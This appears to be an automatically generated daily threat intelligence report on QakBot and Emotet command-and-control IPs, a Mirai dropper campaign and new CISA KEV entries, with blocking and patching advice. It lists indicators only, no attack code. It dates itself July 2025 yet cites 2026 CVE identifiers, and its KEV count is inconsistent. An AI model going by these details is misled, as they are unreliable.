Daily Threat Intelligence Report โ 2025-07-14
Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed across five IPs by Feodotracker, representing an immediate risk to enterprise endpoints. A confirmed Mirai ELF sample (MalwareBazaar) is being distributed via at least ten malicious shell-script download URLs (URLhaus), signaling an active IoT/Linux botnet recruitment campaign. CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog โ including a critical Drupal Core SQL injection (CVE-2026-9082) and a Langflow CORS/RCE flaw (CVE-2025-34291) โ requiring immediate patching action. SOC teams should immediately block all five Feodotracker C2 IPs, patch or isolate Drupal and Langflow instances, and increase monitoring for outbound connections to URLhaus-listed hosts.
Active QakBot & Emotet C2 Infrastructure โ Multi-Family Banking Trojan Campaign
CRITICAL TA505Feodotracker has confirmed five active command-and-control servers operating in the last 24 hours: four serving QakBot (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and one serving Emotet (162.243.103.246). QakBot and Emotet are consistently leveraged by TA505 and affiliated initial-access brokers to establish persistent footholds that are subsequently monetized via ransomware deployment (e.g., Cl0p, BlackBasta). The geographic spread of C2 infrastructure across the US, UK, and Japan indicates deliberate infrastructure diversification to evade geo-based blocking. Any outbound connection to these IPs from an enterprise endpoint should be treated as a confirmed compromise requiring immediate isolation and full forensic investigation.
Active Mirai Botnet Campaign โ Linux/IoT Shell Script Dropper Distribution via URLhaus
HIGH Unknown Threat ActorMalwareBazaar has confirmed an active Mirai ELF binary (SHA256: a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da, tags: elf, Mirai) circulating alongside multiple shell-script (sh-tagged) samples, while URLhaus has simultaneously flagged ten malicious URLs actively serving bin.sh and similar dropper scripts from IPs across multiple Asian-Pacific ranges. This pattern is consistent with automated exploitation of exposed Linux services and IoT devices โ commonly targeting default credentials, Telnet, SSH, and unpatched RCE vulnerabilities โ to recruit devices into a DDoS botnet. The AlienVault OTX pulse 'Untangling a Linux Incident With an OpenAI Twist (Part 2)' corroborates simultaneous multi-actor Linux endpoint compromises including cryptominer deployment, suggesting these URLhaus drop-points may serve multiple payloads beyond Mirai. Organizations with internet-exposed Linux servers, NAS devices, routers, or IP cameras are at heightened risk and should audit for unauthorized outbound connections immediately.
CISA KEV Alert โ Critical Vulnerabilities in Drupal Core, Langflow, and Trend Micro Apex One Require Immediate Patching
MEDIUM Unknown Threat ActorCISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog, three of which present immediate high-severity risk to enterprise environments: CVE-2026-9082 (Drupal Core SQL injection enabling privilege escalation and RCE), CVE-2025-34291 (Langflow CORS misconfiguration with SameSite=None cookie allowing cross-origin credential theft and arbitrary code execution), and CVE-2026-34926 (Trend Micro Apex One directory traversal enabling malicious code injection to managed agents). Additionally, legacy vulnerabilities CVE-2008-4250 (Windows Server Service RPC buffer overflow) and CVE-2009-1537 (Microsoft DirectX QuickTime parser RCE) remain on the KEV list, indicating active exploitation of legacy systems still observed in the wild. All five require immediate mitigation per CISA BOD 22-01 guidance; organizations running Drupal CMS, Langflow AI pipelines, or Trend Micro Apex One on-premise should treat this as an emergency patching event. The Langflow vulnerability is particularly concerning given its presence in AI/ML development pipelines, which are increasingly targeted as entry points into sensitive data environments.